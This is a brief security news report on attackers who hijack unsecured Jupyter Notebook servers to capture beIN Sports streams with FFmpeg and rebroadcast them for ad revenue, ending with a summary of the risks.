Hackers Hijack Unsecured Jupyter Notebooks to Stream Illegal Sports Broadcasts

Cybercriminals are taking advantage of poorly configured JupyterLab and Jupyter Notebooks to engage in stream ripping and facilitate sports piracy using live-streaming capture tools. The attackers gain initial access by hijacking unsecured Jupyter Notebooks and then execute a series of actions aimed at illegally streaming sports events. This hidden piracy operation was uncovered by the cloud security firm after one of its honeypots was targeted. Since Jupyter Notebooks are commonly used for data science, their compromise raises significant concerns. The attacker first updated the server and then proceeded to download the FFmpeg tool. The attacker later executed FFmpeg to capture live sports streams and redirect them to their server. The ultimate objective of the campaign is to download FFmpeg from MediaFire and use it to record live sports broadcasts from the Qatari beIN Sports network. The captured streams are then rebroadcast illegally via ustream[.]tv, allowing threat actors to exploit compromised Jupyter Notebook servers as intermediaries. Additionally, they generate revenue by displaying ads on their unauthorized broadcasts. The identity of the perpetrators remains unknown, but an IP address linked to the attack (41.200.19.23) suggests a possible connection to Arabic-speaking regions.
Potential risks include denial-of-service, data manipulation, data theft, corruption of AI and ML processes, lateral movement to more critical environments, and, in the worst-case scenario, substantial financial and reputational damage.